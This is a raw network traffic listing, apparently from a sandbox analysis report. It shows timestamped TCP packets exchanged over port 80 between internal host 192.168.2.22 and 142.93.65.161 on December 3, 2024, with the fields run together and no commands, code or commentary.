                                                                                                                                                                                  Dec 3, 2024 14:01:40.363615036 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.372009039 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.372065067 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.372116089 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.385174990 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.385576963 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.385723114 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.388542891 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.388724089 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.388771057 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.395092964 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.395104885 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.395139933 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.400785923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.400801897 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.400949955 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.406960011 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.406972885 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.407010078 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.412698984 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.486006975 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.486021042 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.486128092 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.488697052 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.488708973 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.488770962 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.493717909 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.493797064 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.493850946 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.499131918 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.499144077 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.499212980 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.504067898 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.504102945 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.504143953 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.509124994 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.509187937 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.509227037 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.514271021 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.514517069 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.514556885 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.519190073 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.519284964 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.519328117 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.522134066 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.522140980 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.522203922 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.524920940 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.524996996 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.525042057 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.527865887 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.527874947 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.527925968 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.530284882 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.530630112 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.530637026 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.530685902 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.533360004 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.533395052 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.533440113 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.536385059 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.536391973 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.536442995 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.539164066 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.539170027 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.539218903 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.541660070 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.541771889 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.541815996 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.544689894 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.544698000 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.544743061 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.547278881 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.547359943 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.547405005 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.549937010 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.550045013 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.550092936 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.552755117 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.552788973 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.552839994 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.555527925 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.555610895 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.555664062 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.558319092 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.558412075 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.558460951 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.561080933 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.561141014 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.561186075 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.563849926 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.563994884 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.564043045 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.566586971 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.566842079 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.566888094 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.569510937 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.569519997 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.569577932 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.606211901 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.606340885 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.606408119 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.608834028 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.608840942 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.608900070 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.614171028 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.614373922 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.614453077 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.619235039 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.619390965 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.619462967 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.620491028 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.696405888 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.696553946 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.696618080 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.697573900 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.697621107 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.697649002 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.699079990 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.699146986 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.699182034 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.701426983 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.701513052 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.701551914 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.703965902 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.704046011 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.704230070 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.705996990 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.706041098 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.706088066 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.707861900 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.707943916 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.708235979 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.709813118 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.709892988 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.710225105 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.711962938 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.712058067 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.712091923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.714117050 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.714133978 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.714205027 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.716336012 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.716344118 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.716424942 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.718485117 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.718548059 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.718632936 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.720599890 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.720720053 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.720792055 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.722693920 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.722834110 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.722932100 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.724879980 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.725362062 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.725445032 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.727271080 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.727488041 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.727560997 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.729392052 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.729401112 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.729480028 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.731348991 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.731493950 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.731662035 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.733042002 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.733258009 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.733416080 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.734633923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.734807968 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.735013008 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.736325026 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.736660004 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.736779928 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.737881899 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.737890005 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.737970114 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.739589930 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.739599943 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.739676952 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.741370916 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.741379976 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.741456032 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.742746115 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.743071079 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.743184090 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.744431973 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.744535923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.744663000 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.746016026 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.746047974 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.746260881 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.816751957 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.816761971 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.816984892 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.817718029 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.817740917 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.817791939 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.821480036 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.821484089 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.821567059 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.824304104 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.824311018 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.824366093 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.825223923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.827967882 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.827975988 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.828027964 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.829138994 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.829145908 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.829196930 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.830346107 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.830353022 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.830410957 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.832079887 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.832135916 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.832207918 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.834214926 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.834223032 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.834295988 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.835016012 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.835021973 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.835098028 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.836694002 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.836700916 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.836781979 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.838326931 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.838388920 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.838458061 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.840312958 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.840428114 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.840502024 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.842147112 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.842154026 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.842246056 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.843442917 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.844099045 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.844181061 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.844990969 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.845438004 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.845527887 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.846425056 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.846513033 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.846580982 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.848184109 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.848278999 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.848347902 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.849698067 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.849813938 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.849891901 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.851265907 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.851372004 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.851444960 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.853005886 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.853019953 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.853085995 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.854576111 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.854644060 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.854712963 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.856245041 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.856251955 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.856329918 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.857898951 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.858067989 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.858129025 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.859304905 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.859458923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.859525919 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.860831976 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.906891108 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.906963110 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.906989098 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.907690048 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.907767057 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.907936096 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.909313917 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.909351110 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.909377098 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.910990953 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.911075115 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.911087990 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.912580013 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.912635088 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.913058996 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.914197922 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.914251089 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.914268017 CET8049177142.93.65.161192.168.2.22
